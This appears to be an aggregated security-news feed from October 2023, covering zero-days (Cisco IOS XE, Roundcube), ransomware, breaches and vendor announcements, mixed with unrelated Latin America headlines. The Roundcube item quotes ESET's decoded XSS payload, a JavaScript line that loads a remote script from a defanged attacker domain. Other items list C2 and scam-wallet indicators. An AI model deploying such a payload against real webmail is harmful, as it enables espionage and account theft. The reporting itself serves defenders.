            Malwarebytes launched a new consumer solution, Identity Theft Protection. The new service helps individuals secure their digital identities and defend against identity and online threats. Malwarebytes Identity Theft Protection includes real-time identity monitoring and alerts, credit protection and reporting, and live agent-supported identity recovery and resolution services – backed by up to a $2 million identity theft insurance policy. The new service, paired with Malwarebytes’ antivirus and VPN software, helps prevent criminals from stealing or using … More

            The post Malwarebytes Identity Theft Protection defends users against online threats appeared first on Help Net Security.




            Nation State Hackers Exploiting Zero-Day in Roundcube Webmail Software

            exploits government
            2023-10-25 https://thehackernews.com/2023/10/nation-state-hackers-exploiting-zero.html
            The threat actor known as Winter Vivern has been observed exploiting a zero-day flaw in Roundcube webmail software on October 11, 2023, to harvest email messages from victims' accounts. "Winter Vivern has stepped up its operations by using a zero-day vulnerability in Roundcube," ESET security researcher Matthieu Faou said in a new report published today. Previously, it was using known



            Chilean telecom giant GTD hit by the Rorschach ransomware gang

            exploits latam ransomware Telcos
            2023-10-25 https://www.bleepingcomputer.com/news/security/chilean-telecom-giant-gtd-hit-by-the-rorschach-ransomware-gang/
            Chile's Grupo GTD warns that a cyberattack has impacted its Infrastructure as a Service (IaaS) platform, disrupting online services. [...]

            Autosummary: "We understand the importance of proactive and fluid communication in the face of incidents, therefore, in accordance with what we previously discussed on the phone, I would like to inform you that we are experiencing a partial impact on services as a result of a cybersecurity incident," reads a GTD security incident notification. On the morning of October 23rd, GTD suffered a cyberattack that impacted numerous services, including its data centers, internet access, and Voice-over-IP (VoIP).


            Update vCenter Server now! VMWare fixes critical vulnerability

            exploits
            2023-10-25 https://www.malwarebytes.com/blog/news/2023/10/update-vcenter-server-now-vmware-fixes-critical-vulnerability

            Categories: Business, Exploits and vulnerabilities, News

            Tags: VMWare, vCenter Server, CVE-2023-34056, CVE-2023-34048, DCE/RPC, out of bounds write, information disclosure, remote code execution

            VMWare has issued an update to address out-of-bounds write and information disclosure vulnerabilities in its server management software, vCenter Server.

            The post Update vCenter Server now! VMWare fixes critical vulnerability appeared first on Malwarebytes Labs.


            Autosummary: Fixed version(s) and release notes:
            - VMware vCenter Server 8.0U2: Downloads and Documentation: https://customerconnect.vmware.com/downloads/details?downloadGroup=VC80U2&productId=1345&rPId=110105
            - VMware vCenter Server 8.0U1d: Downloads and Documentation: https://customerconnect.vmware.com/downloads/details?downloadGroup=VC80U1D&productId=1345&rPId=112378
            - VMware vCenter Server 7.0U3o: Downloads and Documentation: https://customerconnect.vmware.com/downloads/details?downloadGroup=VC70U3O&productId=974&rPId=110262
            - Cloud Foundation 5.x/4.x: https://kb.vmware.com/s/article/88287
            VMWare also published an FAQ about this update.


            Cyberattack hits 5 hospitals

            ciber
            2023-10-25 https://www.malwarebytes.com/blog/news/2023/10/cyberattack-on-service-provider-impacts-operations-in-5-hospitals

            Categories: News

            Tags: Transform, service provider, 5 hospitals, Canada, cyberattack

            A cyberattack on shared service provider TransForm has impacted operations in five Canadian hospitals.

            The post Cyberattack hits 5 hospitals appeared first on Malwarebytes Labs.


            Autosummary: The five affected hospitals, Bluewater Health, Chatham Kent Health Alliance, Erie Shores HealthCare, Hôtel-Dieu Grace Healthcare, and Windsor Regional Hospital, have had to reschedule appointments with their patients due to the attack.


            Announcing NEW Malwarebytes Identity Theft Protection

            exploits
            2023-10-25 https://www.malwarebytes.com/blog/personal/2023/10/announcing-new-malwarebytes-identity-theft-protection

            Categories: Personal

            In today’s hyper-connected world, Malwarebytes now protects your identity, reputation, and credit all in one place, so you can focus on living your life.


            The post Announcing NEW Malwarebytes Identity Theft Protection appeared first on Malwarebytes Labs.


            Autosummary: Here’s what you get (based on your selected plan):
            - Ongoing monitoring: peace of mind that we are actively working in the background to keep you safe
            - Real-time alerts: immediate notifications if we identify suspicious activity
            - Recommendations and best practices: advice on how to prevent identity theft, and help if it happens
            - Identity restoration helpline and top-notch customer support


            Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers

            exploits
            2023-10-25 https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/
            ESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible

            Autosummary: Malicious email message: At first sight, the email doesn’t seem malicious – but if we examine the HTML source code, shown in Figure 2, we can see an SVG tag at the end, which contains a base64-encoded payload. Decoding the payload in the onerror attribute gives us the following JavaScript code (with the malicious URL manually defanged), which will be executed in the browser of the victim in the context of their Roundcube session:
            var fe=document.createElement("script");fe.src="https://recsecas[.]com/controlserver/checkupdate.js";document.body.appendChild(fe);
            Surprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. ESET Research has been closely tracking the cyberespionage operations of Winter Vivern for more than a year and, during our routine monitoring, we found that the group began exploiting a zero-day XSS vulnerability in the Roundcube Webmail server on October 11th, 2023.


            Archaeologists reveal face of Peru's "Ice Maiden" mummy

            latam
            2023-10-25 https://www.bbc.co.uk/news/world-latin-america-67215649?at_medium=RSS&at_campaign=KARANGA
            Experts have reconstructed the face of the "Ice Maiden", an Inca girl sacrificed in the Andes "

            Autosummary: "


            Videos show Hurricane damage in Mexico

            latam
            2023-10-25 https://www.bbc.co.uk/news/world-latin-america-67221443?at_medium=RSS&at_campaign=KARANGA
            Mexico President Andrés Manuel López Obrador said there is no communication with the affected area. "

            Autosummary: "


            Irish woman sacked for Israel "terrorist state" post

            government
            2023-10-25 https://www.bbc.co.uk/news/articles/c88e2ewg37go?at_medium=RSS&at_campaign=KARANGA
            The woman should seek advice if she was sacked by Wix for her political views, Ireland's leader says. "

            Autosummary: "


            Bracing for AI-enabled ransomware and cyber extortion attacks

            exploits ransomware
            2023-10-24 https://www.helpnetsecurity.com/2023/10/24/ai-enabled-attacks/

            AI has been the shiniest thing in tech since at least November 2022, when ChatGPT was made available to the masses and unveiled the transformative potential of large language models for all the world to see. As businesses scramble to take the lead in operationalizing AI-enabled interfaces, ransomware actors will use it to scale their operations, widen their profit margins, and increase their likelihood of pulling off successful attacks. As a result, an already sophisticated … More

            The post Bracing for AI-enabled ransomware and cyber extortion attacks appeared first on Help Net Security.

            "

            Autosummary: Eliminate lateral movement – AI-powered policy recommendation based on training data from millions of leveraging private app telemetry, user context, behavior, and location will simplify the process of user-to-app segmentation. Stop data loss – AI-assisted data classification will help organizations tag sensitive data and enforce strict controls against uploading it to cloud storage. In a dark parody of legitimate organizations, in the coming years ransomware groups may use chatbots and other AI-enabled tools to: use AI voice cloning for voice-based phishing (a.k.a. vishing) attacks to impersonate employees to gain privileged access; tailor email-based phishing attacks with native language accuracy in multiple languages; discover and identify zero-day vulnerabilities that can be leveraged for initial access; reduce the time required to develop malicious code and lower the bar for entry. When AI-enabled capabilities are coupled with potent malware, we should expect cybercriminals to double down on ransomware as a means of generating revenue rather than abandoning it in favor of something new. "


            Spain police dismantled a cybercriminal group who stole the data of 4 million individuals

            ciber
            2023-10-24 https://securityaffairs.com/152946/cyber-crime/spanish-police-dismantled-cybercriminal-group.html

            The Spanish police have arrested 34 members of the cybercriminal group that is accused of having stolen data of over four million individuals. The Spanish police have arrested 34 members of a cybercriminal group that is suspected to have stolen data of over four million individuals. The authorities conducted 16 searches in Madrid, Málaga, Huelva, […]

            The post Spain police dismantled a cybercriminal group who stole the data of 4 million individuals appeared first on Security Affairs.

            "

            Autosummary: "


            Ivanti’s new capabilities simplify vulnerability prioritization and remediation

            exploits
            2023-10-24 https://www.helpnetsecurity.com/2023/10/24/ivanti-security-solutions/

            Ivanti released new capabilities for the Ivanti Neurons platform to improve the digital employee experience, offer scalability to customers and enhance vulnerability prioritization and remediation.​ With this release, Ivanti continues to deliver on its mission to empower IT and Security teams with a 360-degree view of their entire IT estate – providing visibility, actionable insights and security. “We are dedicated to building technologies that enable a seamless, secure workplace for employees,” said Dr. Srinivas Mukkamala, … More

            The post Ivanti’s new capabilities simplify vulnerability prioritization and remediation appeared first on Help Net Security.

            "

            Autosummary: New enterprise service management solution packages Based on business needs and scalability, Ivanti is offering four enterprise service management solution packages: ITSM Professional, ITSM Enterprise, ITSM Premium, and ITSM Enterprise Premium. "


            Semperis and Veritas defend enterprises against cyberattacks on Microsoft AD systems

            ciber
            2023-10-24 https://www.helpnetsecurity.com/2023/10/24/semperis-veritas/

            Semperis announced a global relationship with Veritas Technologies to protect enterprises’ most critical assets and identity systems from cyberattacks. The powerful combination of Semperis Active Directory Forest Recovery (ADFR) and Veritas NetBackup provides enterprises with a comprehensive solution to guard against, and recover from, cyberattacks on Microsoft Active Directory (AD) systems. Microsoft AD, the primary identity system and backbone of IT operations for 90 percent of organizations, is a common target for ransomware operators and … More

            The post Semperis and Veritas defend enterprises against cyberattacks on Microsoft AD systems appeared first on Help Net Security.

            "

            Autosummary: The joint solution delivers protection and recovery for AD environments, including: A blueprint for inventorying, classifying, and monitoring data with Veritas 360 Defense to protect it from cyberattacks Anomaly detection and virus scanning through Veritas NetBackup to ensure data is virus-free before recovery Fast, automated, malware-free recovery of the entire AD forest to any virtual or physical hardware with Semperis ADFR in the event of an attack that compromises AD Post-breach forensics with Semperis ADFR to help incident response teams eliminate backdoors, attack paths, and other vulnerabilities remaining in the environment “Veritas and Semperis are industry leaders in data protection and AD security and recovery, respectively,” added Mar-Elia. "


            34 Cybercriminals Arrested in Spain for Multi-Million Dollar Online Scams

            financial ciber
            2023-10-24 https://thehackernews.com/2023/10/34-cybercriminals-arrested-in-spain-for.html
            Spanish law enforcement officials have announced the arrest of 34 members of a criminal group that carried out various online scams, netting the gang about €3 million ($3.2 million) in illegal profits. Authorities conducted searches across 16 locations in Madrid, Malaga, Huelva, Alicante, and Murcia, seizing two simulated firearms, a katana sword, a baseball bat, €80,000 in cash, four high-end "

            Autosummary: "


            iOS Zero-Day Attacks: Experts Uncover Deeper Insights into Operation Triangulation

            exploits
            2023-10-24 https://thehackernews.com/2023/10/operation-triangulation-experts-uncover.html
            The TriangleDB implant used to target Apple iOS devices packs in at least four different modules to record microphone, extract iCloud Keychain, steal data from SQLite databases used by various apps, and estimate the victim's location. The findings come from Kaspersky, which detailed the great lengths the adversary behind the campaign, dubbed Operation Triangulation, went to conceal and cover up "

            Autosummary: Also delivered after a series of undetermined steps is a Binary Validator, a Mach-O binary file that carries out the below operations: remove crash logs from the /private/var/mobile/Library/Logs/CrashReporter directory to erase traces of possible exploitation; delete evidence of the malicious iMessage attachment sent from 36 different attacker-controlled Gmail, Outlook, and Yahoo email addresses; obtain a list of processes running on the device and the network interfaces; check if the target device is jailbroken; turn on personalized ad tracking; gather information about the device (username, phone number, IMEI, and Apple ID); and retrieve a list of installed apps. "What is interesting about these actions is that the validator implements them both for iOS and macOS systems," the researchers said, adding the results of the aforementioned actions are encrypted and exfiltrated to a command-and-control (C2) server to fetch the TriangleDB implant. "


            ASVEL basketball team confirms data breach after ransomware attack

            financial exploits ransomware
            2023-10-24 https://www.bleepingcomputer.com/news/security/asvel-basketball-team-confirms-data-breach-after-ransomware-attack/
            French professional basketball team LDLC ASVEL (ASVEL) has confirmed that data was stolen after the NoEscape ransomware gang claimed to have attacked the club. [...] "

            Autosummary: The threat actors claimed to have stolen 32 GB of data, including the personal data of players, passports and ID cards, and many documents relating to finance, taxation, and legal matters. "


            VMware warns admins of public exploit for vRealize RCE flaw

            exploits
            2023-10-24 https://www.bleepingcomputer.com/news/security/vmware-warns-admins-of-public-exploit-for-vrealize-rce-flaw/
            VMware warned customers on Monday that proof-of-concept (PoC) exploit code is now available for an authentication bypass flaw in vRealize Log Insight (now known as VMware Aria Operations for Logs). [...] "

            Autosummary: The first (CVE-2022-31706) is a directory traversal bug, the second (CVE-2022-31704) is a broken access control flaw, while the third, an information disclosure bug (CVE-2022-31711), allows attackers to gain access to sensitive session and application info. Attackers can chain these vulnerabilities (collectively tracked as VMSA-2023-0001 by VMware) to inject maliciously crafted files into the operating system of VMware appliances running unpatched Aria Operations for Logs software. "


            September was a record month for ransomware attacks in 2023

            exploits ransomware
            2023-10-24 https://www.bleepingcomputer.com/news/security/september-was-a-record-month-for-ransomware-attacks-in-2023/
            Ransomware activity in September reached unprecedented levels following a relative lull in August that was still way above regular standards for summer months. [...] "

            Autosummary: The most targeted sectors were "industrials" (construction, engineering, commercial services) with 169 attacks, "consumer cyclicals" (retail, media, hotels) with 94, technology (software and IT services, networking, telecommunications) with 52, and healthcare with 38. "


            Versa Secure SD-LAN delivers zero trust and IoT security

            industry
            2023-10-24 https://www.helpnetsecurity.com/2023/10/24/versa-secure-sd-lan/

            Versa Networks announced Versa Secure SD-LAN, a software-defined branch and campus Local Area Network (LAN) solution to deliver zero trust and IoT security natively at the LAN Edge. This software-defined approach makes campus and branch networks more agile and integrated, and zero trust improves the security posture. For years, enterprises have grappled with the limitations and vendor lock-in from traditional LAN solutions. Legacy LAN architectures create painful operational challenges and cannot meet the evolving business … More

            The post Versa Secure SD-LAN delivers zero trust and IoT security appeared first on Help Net Security.

            "

            Autosummary: Ethernet switches that deliver line rate L2, L3, VXLAN, and L4-7 security including firewall, application identification, adaptive micro-segmentation, IoT fingerprinting, and inline ZTNA. Pre-emptively adjusts traffic paths in real-time, automates troubleshooting, optimizes operations, reduces network downtime, and improves predictability. Converges routing, SD-WAN, SD-LAN, and security into a single branch appliance to deliver simplified management and lower Total Cost of Ownership (TCO). "


            Veeam and Sophos partner to help organizations detect cybersecurity threats

            ciber
            2023-10-24 https://www.helpnetsecurity.com/2023/10/24/veeam-software-sophos-partnership/

            Veeam Software announced a strategic partnership with Sophos. Through the partnership, Veeam Data Platform will integrate with Sophos Managed Detection and Response (MDR), adding a critical layer of human-led threat detection and response to advance the security of business-critical backups against ransomware attackers who attempt to manipulate, delete or change the customers' backup environment as a tactic in their overall attack chain to increase pressure on victims to pay the ransom. With persistent cyberattackers constantly … More

            The post Veeam and Sophos partner to help organizations detect cybersecurity threats appeared first on Help Net Security.

            "

            Autosummary: Should a threat be identified, such as an attacker attempting to tamper with backups, Veeam sends an alert to Sophos MDR—a fully-managed threat hunting, detection and response service that provides a dedicated 24/7 security team that rapidly identifies and neutralizes complex attacks, including ransomware, network breaches, hands-on keyboard adversaries, and more. "


            Hackers backdoor Russian state, industrial orgs for data theft

            government industry rusia-ucrania
            2023-10-24 https://www.bleepingcomputer.com/news/security/hackers-backdoor-russian-state-industrial-orgs-for-data-theft/
            Several state and key industrial organizations in Russia were attacked with a custom Go-based backdoor that performs data theft, likely aiding espionage operations. [...] "

            Autosummary: Search disk for files of specific extensions (.doc, .docx, .pdf, .xls, .xlsx, .ppt, .pptx, .zip, .rar, .7z, .odt, .ods, .kdbx, .ovpn, .pem, .crt, .key) and transfer them to the C2. "


            Cyberattack on health services provider impacts 5 Canadian hospitals

            ciber
            2023-10-24 https://www.bleepingcomputer.com/news/security/cyberattack-on-health-services-provider-impacts-5-canadian-hospitals/
            A cyberattack on shared service provider TransForm has impacted operations in five hospitals in Ontario, Canada, impacting patient care and causing appointments to be rescheduled. [...] "

            Autosummary: TransForm is a not-for-profit, shared service organization founded by five hospitals in Erie St. Clair, Ontario, to manage their IT, supply chain, and accounts payable. "


            Spanish police make 34 arrests, dismantling cybercriminal gang that stole 4 million people’s data

            ciber
            2023-10-24 https://www.bitdefender.com/blog/hotforsecurity/spanish-police-make-34-arrests-dismantling-cybercriminal-gang-that-stole-4-million-peoples-data/
            Spanish police have arrested 34 suspected members of a criminal gang that are alleged to have run a variety of scams to steal data from over four million people. Law enforcement agents across the country took part in 16 searches that not only seized electronic equipment and computer databases, four expensive vehicles, and $80,000 Euros but also confiscated a baseball bat, a katana, and two firearms. Read more in my article on the Hot for Security blog. "

            Autosummary: "


            Experts released PoC exploit code for VMware Aria Operations for Logs flaw. Patch it now!

            exploits
            2023-10-24 https://securityaffairs.com/152977/hacking/vmware-aria-operations-for-logs-flaw-poc.html

            VMware is aware of the availability of a proof-of-concept (PoC) exploit code for an authentication bypass flaw in VMware Aria Operations for Logs. VMware warned customers of the availability of a proof-of-concept (PoC) exploit code for an authentication bypass vulnerability, tracked as CVE-2023-34051, in VMware Aria Operations for Logs (formerly known as vRealize Log Insight). The […]

            The post Experts released PoC exploit code for VMware Aria Operations for Logs flaw. Patch it now! appeared first on Security Affairs.

            "

            Autosummary: VMware warned customers of the availability of a proof-of-concept (PoC) exploit code for an authentication bypass vulnerability, tracked as CVE-2023-34051, in VMware Aria Operations for Logs (formerly known as vRealize Log Insight). "


            Brazil drought reveals ancient rock carvings of human faces

            latam
            2023-10-24 https://www.bbc.co.uk/news/world-latin-america-67204409?at_medium=RSS&at_campaign=KARANGA
            The carvings of human faces on the shore of the Amazon are thought to be at least 1,000 years old. "

            Autosummary: "


            Mexico police shot dead in ambush in Guerrero state

            latam government
            2023-10-24 https://www.bbc.co.uk/news/world-latin-america-67202231?at_medium=RSS&at_campaign=KARANGA
            At least 11 officers and two security chiefs are killed near the Pacific resort of Acapulco, local media say. "

            Autosummary: "


            Short selling: Don’t be the "Dumb Money"

            financial
            2023-10-24 https://www.bbc.co.uk/news/business-67087678?at_medium=RSS&at_campaign=KARANGA
            Short selling can be risky, but more and more amateur investors are taking it up. "

            Autosummary: "


            Navigating OT/IT convergence and securing ICS environments

            industry
            2023-10-23 https://www.helpnetsecurity.com/2023/10/23/securing-control-systems-environment-video/

            Escalating threats to operational technology (OT) have prompted an increasing number of global enterprises to adopt sophisticated technologies and services to enhance the security of their assets. In this Help Net Security video, Christopher Warner, Senior GRC-OT Security Consultant at GuidePoint Security, discusses securing the control systems environment, as well as creating a cybersecurity roadmap. OT necessitates a systematic approach. Unique characteristics, such as the importance of safety and the critical nature of system uptime, … More

            The post Navigating OT/IT convergence and securing ICS environments appeared first on Help Net Security.

            "

            Autosummary: "


            Cyberattacks put healthcare organizations on high alert

            ciber
            2023-10-23 https://www.helpnetsecurity.com/2023/10/23/healthcare-cybersecurity-vulnerabilities-video/

            Healthcare organizations have become prime targets for cybercriminals due to the immense value of their data, including patient records, sensitive medical information, and financial data. The importance of protecting this invaluable information, alongside ensuring the seamless operation of medical devices and essential systems, has never been more critical. In this Help Net Security round-up, we present segments from previously recorded videos in which security experts discuss the vulnerabilities and gaps in healthcare cybersecurity. Complete videos … More

            The post Cyberattacks put healthcare organizations on high alert appeared first on Help Net Security.

            "

            Autosummary: "


            Vietnamese threat actors linked to DarkGate malware campaign

            exploits
            2023-10-23 https://securityaffairs.com/152886/malware/vietnamese-threat-actors-darkgate-malware.html

            Researchers linked Vietnamese threat actors to the string of DarkGate malware attacks on entities in the U.K., the U.S., and India. WithSecure researchers linked the recent attacks using the DarkGate malware to a Vietnamese cybercrime group previously known for the usage of Ducktail stealer. DarkGate is a commodity malware that is offered with a model […]

            The post Vietnamese threat actors linked to DarkGate malware campaign appeared first on Security Affairs.

            "

            Autosummary: Pierluigi Paganini, October 23, 2023. Researchers linked Vietnamese threat actors to the string of DarkGate malware attacks on entities in the U.K., the U.S., and India. "


            City of Philadelphia discloses data breach after five months

            financial government
            2023-10-23 https://www.bleepingcomputer.com/news/security/city-of-philadelphia-discloses-data-breach-after-five-months/
            The City of Philadelphia is investigating a data breach after attackers "may have gained access" to City email accounts containing personal and protected health information five months ago, in May. [...] "

            Autosummary: "


            “Disappearing” implants, followed by first fixes for exploited Cisco IOS XE zero-day

            exploits
            2023-10-23 https://www.helpnetsecurity.com/2023/10/23/disappearing-implants-cve-2023-20198-fixes/

            Cisco has released the first fixes for the IOS XE zero-day (CVE-2023-20198) exploited by attackers to ultimately deliver a malicious implant. The fixes were made available on Sunday, but a curious thing happened the day before: several cybersecurity companies and organizations noticed a drastic reduction in the number of internet-facing Cisco devices that were saddled with the implant. The reason behind that change is still unclear, but several theories have been put forward. The attackers … More

            The post “Disappearing” implants, followed by first fixes for exploited Cisco IOS XE zero-day appeared first on Help Net Security.

            "

            Autosummary: The attackers leveraged two zero-days (CVE-2023-20273). On October 16, Cisco revealed that attackers have been spotted exploiting one previously unknown vulnerability (CVE-2023-20198) and an older one (CVE-2021-1435) in the web UI of Cisco IOS XE software to create highest-privilege accounts and install an implant/backdoor on internet-facing network devices. "


            US energy firm shares how Akira ransomware hacked its systems

            exploits ransomware industry
            2023-10-23 https://www.bleepingcomputer.com/news/security/us-energy-firm-shares-how-akira-ransomware-hacked-its-systems/
            In a rare display of transparency, US energy services firm BHI Energy details how the Akira ransomware operation breached their networks and stole the data during the attack. [...] "

            Autosummary: An investigation concluded on September 1, 2023, indicates that the following data was stolen: Full name Date of birth Social Security Number (SSN) Health information At the time of writing this, Akira ransomware has not leaked any data belonging to BHI on its extortion portal on the dark web, and neither have the cybercriminals announced BHI in their upcoming data leaks. "


            Spain arrests 34 cybercriminals who stole data of 4 million people

            ciber
            2023-10-23 https://www.bleepingcomputer.com/news/security/spain-arrests-34-cybercriminals-who-stole-data-of-4-million-people/
            The Spanish National Police have dismantled a cybercriminal organization that carried out a variety of computer scams to steal and monetize the data of over four million people. [...] "

            Autosummary: "


            Cisco patches IOS XE zero-days used to hack over 50,000 devices

            exploits
            2023-10-23 https://www.bleepingcomputer.com/news/security/cisco-patches-ios-xe-zero-days-used-to-hack-over-50-000-devices/
            Cisco has addressed the two vulnerabilities (CVE-2023-20198 and CVE-2023-20273) that hackers exploited to compromise tens of thousands of IOS XE devices over the past week. [...] "

            Autosummary: On Cisco devices, permissions to issue commands are locked into levels from zero to 15, with zero providing five basic commands (“logout,” “enable,” “disable,” “help,” and “exit”) and 15 being the most privileged level that provides complete control over the device. (Figure: Count of hacked Cisco IOS XE devices plummets; source: The ShadowServer Foundation.) The reason for the sudden low number could also be that a grey-hat hacker has been automatically rebooting infected devices to remove the malicious implant. "


            Centific and Prove Identity partner to bridge cybersecurity and fraud protection gap

            ciber
            2023-10-23 https://www.helpnetsecurity.com/2023/10/23/centific-prove-identity/

            Centific and Prove Identity have partnered to bridge the gap between cybersecurity and fraud protection. This initiative will redefine the digital security landscape by offering a holistic solution for ensuring data privacy, identity verification, and digital fraud protection that protects businesses and their customers while also enhancing customer experiences. This joint effort by Centific and Prove Identity aims to provide a one-stop-shop for businesses looking to enhance digital security while providing safe and seamless customer … More

            The post Centific and Prove Identity partner to bridge cybersecurity and fraud protection gap appeared first on Help Net Security.

            "

            Autosummary: "


            Jumio 360° Fraud Analytics identifies patterns based on behavioral similarities

            industry
            2023-10-23 https://www.helpnetsecurity.com/2023/10/23/jumio-360-fraud-analytics/

            Jumio unveiled Jumio 360° Fraud Analytics, its new fraud-fighting technology that uses AI-driven predictive analytics to identify fraud patterns with more sophistication and accuracy. According to Jumio’s analysis, 25% of fraud is interconnected — either perpetrated by fraud rings or by individuals using the same information or credentials to open new accounts on banking sites, ecommerce platforms, sharing economy sites and more. A single organized crime operation or fraud ring can cause damage into the … More

            The post Jumio 360° Fraud Analytics identifies patterns based on behavioral similarities appeared first on Help Net Security.

            "

            Autosummary: Key features include: Graph database technology and machine learning classify identity transactions into clusters based on behavioral similarities, which is especially powerful for identifying fraud rings AI-driven predictive analytics determine the likelihood of fraud risk for each identity transaction based on its cluster association The predictive fraud score can be used to automatically reject identity transactions, stopping fraudsters from accessing your platform in real time Dashboards provide transparency and help you visualize connected data Jumio 360° Fraud Analytics is currently available in early release to select customers and will be generally available in early 2024. "


            City of Philadelphia suffers a data breach

            financial government
            2023-10-23 https://securityaffairs.com/152909/hacking/city-of-philadelphia-data-breach.html

            The City of Philadelphia discloses a data breach that resulted from a cyber attack that took place on May 24 and that compromised City email accounts. The City of Philadelphia announced it is investigating a data breach after threat actors broke into some City email accounts containing personal and protected health information. The […]

            The post City of Philadelphia suffers a data breach appeared first on Security Affairs.

            "

            Autosummary: Exposed information varies by individual and can include demographic information (i.e. name, address, date of birth, social security number, and other contact information), medical information (i.e. diagnosis and other treatment-related information), and limited financial information, such as claims information. "


            University of Michigan employee, student data stolen in cyberattack

            ciber
            2023-10-23 https://www.bleepingcomputer.com/news/security/university-of-michigan-employee-student-data-stolen-in-cyberattack/
            The University of Michigan says in a statement today that they suffered a data breach after hackers broke into its network in August and accessed systems with information belonging to students, applicants, alumni, donors, employees, patients, and research study participants. [...] "

            Autosummary: "


            Palestine crypto donation scams emerge amid Israel-Hamas war

            financial
            2023-10-23 https://www.bleepingcomputer.com/news/security/palestine-crypto-donation-scams-emerge-amid-israel-hamas-war/
            As thousands of civilians die amid the deadly Israel-Hamas war, scammers are capitalizing on the horrific events to collect donations by pretending to be legitimate charities. BleepingComputer has come across several posts on X (formerly Twitter), Telegram and Instagram where scammers list dubious cryptocurrency wallet addresses. [...] "

            Autosummary: "For instance, they use various call-to-donate phrases like 'we call to your compassion and benevolence' or 'we call to your empathy and generosity,' and substitute words like 'help' with synonyms such as 'support,' 'aid,' etc." The "Aid Gaza" support page lists Bitcoin, Ethereum, and USDT wallet addresses: BTC: 16gbXTmvxtrzieoh2vX3io7FhXK4WJryX2, ETH: 0x5E8b0df880A9f9F6e4D4090a84b3c1A02fF311b4, USDT: TK4A9dfwqbJhzz4NeGJZBo9nVMJztxnT27. Fortunately, BleepingComputer tracked the crypto addresses' transaction history and observed no donations have been sent yet to any of these addresses. (Figure: "AidGaza" website and social media accounts claim that it provides humanitarian aid; source: BleepingComputer.) The operators behind this account have listed their Ethereum, Bitcoin, and USDT addresses on its website and social media accounts [1, 2] where funds should be sent. "


            Citrix warns admins to patch NetScaler CVE-2023-4966 bug immediately

            exploits
            2023-10-23 https://www.bleepingcomputer.com/news/security/citrix-warns-admins-to-patch-netscaler-cve-2023-4966-bug-immediately/
            Citrix warned admins today to secure all NetScaler ADC and Gateway appliances immediately against ongoing attacks exploiting the CVE-2023-4966 vulnerability. [...] "

            Autosummary: "


            Cisco warns of a second IOS XE zero-day used to infect devices worldwide

            exploits
            2023-10-23 https://securityaffairs.com/152924/hacking/cisco-ios-xe-zero-day-cve-2023-20273.html

            Cisco found a second IOS XE zero-day vulnerability, tracked as CVE-2023-20273, which is actively exploited in attacks in the wild. Cisco last week warned customers of a zero-day vulnerability, tracked as CVE-2023-20198 (CVSS score 10), in its IOS XE Software that is actively exploited in attacks. The IT giant found the vulnerability during the resolution of multiple Technical Assistance […]

            The post Cisco warns of a second IOS XE zero-day used to infect devices worldwide appeared first on Security Affairs.

            "

Autosummary: Cisco warns of a second IOS XE zero-day used to infect devices worldwide Pierluigi Paganini October 23, 2023 Cisco found a second IOS XE zero-day vulnerability, tracked as CVE-2023-20273, which is actively exploited in attacks in the wild. Thursday 10/19 4pm CET (cleaning step began): 31 220 Today 10/22 5pm CET: 320 #CVE-2023-20198 #CVE-2023-20273 #somethingishappening pic.twitter.com/mh1ugFAfOf — CERT Orange Cyberdefense (@CERTCyberdef) October 22, 2023 At the time of this publishing, it is still unclear who is behind these attacks. "


            CISA adds second Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog

            exploits
            2023-10-23 https://securityaffairs.com/152935/security/cisa-adds-second-cisco-ios-xe-flaw-to-its-known-exploited-vulnerabilities-catalog.html

            US CISA added the vulnerability CVE-2023-20273 in Cisco IOS XE to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability CVE-2023-20273 in Cisco IOS XE to its Known Exploited Vulnerabilities catalog. The vulnerability is an unspecified issue in the web user interface. An attacker can chain this flaw with CVE-2023-20198 to leverage the new […]

            The post CISA adds second Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

            "

Autosummary: CISA adds second Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini October 23, 2023 US CISA added the vulnerability CVE-2023-20273 in Cisco IOS XE to its Known Exploited Vulnerabilities catalog. "


            Battling a new DarkGate malware campaign with Malwarebytes MDR

            exploits
            2023-10-23 https://www.malwarebytes.com/blog/business/2023/10/on-the-frontlines-battling-an-in-the-wild-darkgate-infection-with-malwarebytes-mdr

            Categories: Business

            On September 13th, 2023, the Malwarebytes MDR team spotted a new DarkGate malware campaign on a client network.

            (Read more...)

            The post Battling a new DarkGate malware campaign with Malwarebytes MDR appeared first on Malwarebytes Labs.

            "

Autosummary: Learn more about how Malwarebytes MDR today can help secure your organization: https://try.malwarebytes.com/mdr-consultation-new/ Get a Malwarebytes MDR quote Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks: Tracking down a trojan: An inside look at threat hunting in a corporate network Understanding ransomware reinfection: An MDR case study Indicators of Compromise (IoC): File Details: Filename: C_onfidential Sign_ificant Company Changes.zip; Reported At: 09/13/2023 9:57:56 AM. Network Indicators: C2 IP Address: 5[.]188[.]87[.]58; Malicious URLs: "


            Argentina presidential election: Javier Milei and Sergio Massa head for run-off vote

            latam
            2023-10-23 https://www.bbc.co.uk/news/world-latin-america-67190494?at_medium=RSS&at_campaign=KARANGA
            The country is set for a presidential run-off contest between Sergio Massa and his rival Javier Milei. "

            Autosummary: "


Skulls and flowers on parade at Mexico's Catrinas procession

            latam
            2023-10-23 https://www.bbc.co.uk/news/in-pictures-67193453?at_medium=RSS&at_campaign=KARANGA
Mexicans dressed as skeletons parade through the streets of the capital ahead of the Day of the Dead. "

            Autosummary: "


            Week in review: Cybersecurity cheat sheets, widely exploited Cisco zero-day, KeePass-themed malvertising

            exploits ciber
            2023-10-22 https://www.helpnetsecurity.com/2023/10/22/week-in-review-cybersecurity-cheat-sheets-widely-exploited-cisco-zero-day-keepass-themed-malvertising/

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: North Korean hackers are targeting software developers and impersonating IT workers State-sponsored North Korean hackers have significantly intensified their focus on the IT sector in recent years, by infiltrating firms developing software and companies looking for IT workers. The collaborative power of CISOs, CTOs and CIOs for a secure future In this Help Net Security interview, Phil Venables, CISO at … More

            The post Week in review: Cybersecurity cheat sheets, widely exploited Cisco zero-day, KeePass-themed malvertising appeared first on Help Net Security.

            "

